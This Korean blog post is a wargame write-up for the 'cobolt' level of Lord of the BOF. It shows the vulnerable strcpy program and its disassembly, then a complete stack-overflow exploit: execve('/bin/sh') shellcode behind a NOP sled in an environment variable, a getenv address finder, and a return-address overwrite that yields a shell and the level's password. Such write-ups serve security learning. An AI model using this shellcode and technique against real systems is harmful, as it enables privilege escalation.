본문 바로가기
워게임/lord of bof

level 1 -> 2

알 수 없는 사용자 2015. 10. 23. 22:02


[gremlin@localhost gremlin]$ cat cobolt.c 

/*

        The Lord of the BOF : The Fellowship of the BOF

        - cobolt

        - small buffer

*/


int main(int argc, char *argv[])

{

    char buffer[16];

    if(argc < 2){

        printf("argv error\n");

        exit(0);

    }

    strcpy(buffer, argv[1]);

    printf("%s\n", buffer);

}


(gdb) disas main

Dump of assembler code for function main:

0x8048430 <main>: push   %ebp

0x8048431 <main+1>: mov    %ebp,%esp

0x8048433 <main+3>: sub    %esp,16

0x8048436 <main+6>: cmp    DWORD PTR [%ebp+8],1

0x804843a <main+10>: jg     0x8048453 <main+35>

0x804843c <main+12>: push   0x80484d0

0x8048441 <main+17>: call   0x8048350 <printf>

0x8048446 <main+22>: add    %esp,4

0x8048449 <main+25>: push   0

0x804844b <main+27>: call   0x8048360 <exit>

0x8048450 <main+32>: add    %esp,4

0x8048453 <main+35>: mov    %eax,DWORD PTR [%ebp+12]

0x8048456 <main+38>: add    %eax,4

0x8048459 <main+41>: mov    %edx,DWORD PTR [%eax]

0x804845b <main+43>: push   %edx

0x804845c <main+44>: lea    %eax,[%ebp-16]

0x804845f <main+47>: push   %eax

0x8048460 <main+48>: call   0x8048370 <strcpy>

0x8048465 <main+53>: add    %esp,8

0x8048468 <main+56>: lea    %eax,[%ebp-16]

0x804846b <main+59>: push   %eax

0x804846c <main+60>: push   0x80484dc

0x8048471 <main+65>: call   0x8048350 <printf>

0x8048476 <main+70>: add    %esp,8

0x8048479 <main+73>: leave  

0x804847a <main+74>: ret    

0x804847b <main+75>: nop    

0x804847c <main+76>: nop    

0x804847d <main+77>: nop    

0x804847e <main+78>: nop    

0x804847f <main+79>: nop    

End of assembler dump.

버퍼 크기만 다르네요

환경변수를 이용해먹어보죠

[gremlin@localhost /gremlin]$ cat getenv.c 

#include <stdio.h>

int main(int argc, char* argv[]){ printf("%p\n", getenv(argv[1])); }

[gremlin@localhost/gremlin]$ export sh="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

[gremlin@localhost /gremlin]$ ./getenv sh

0xbffffcca

환경변수 이용해도 안되길래 뭐징 하다가 앞에 nop 좀 넣고 다시해봤습니다.

그와중에 bash2 실행 다시한거때매 환경변수 한번 바뀌고..

[gremlin@localhost gremlin]$ export sh=`perl -e 'print "\x90"x256, "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

[gremlin@localhost gremlin]$ /tmp/getenv sh

0xbffffdef

[gremlin@localhost gremlin]$ ./cobolt `perl -e 'print "\x90"x20, "\xef\xfd\xff\xbf"'`

????????????????????霆

bash$ id

uid=501(gremlin) gid=501(gremlin) euid=502(cobolt) egid=502(cobolt) groups=501(gremlin)

bash$ my-pass

euid = 502

hacking exposed







'워게임 > lord of bof' 카테고리의 다른 글

level 5 -> 6  (0) 2015.10.23
level 4 -> 5  (0) 2015.10.23
level 3 -> 4  (0) 2015.10.23
level 2 -> 3  (0) 2015.10.23
level gate -> 1  (0) 2015.10.23

'워게임/lord of bof' Related Articles

티스토리툴바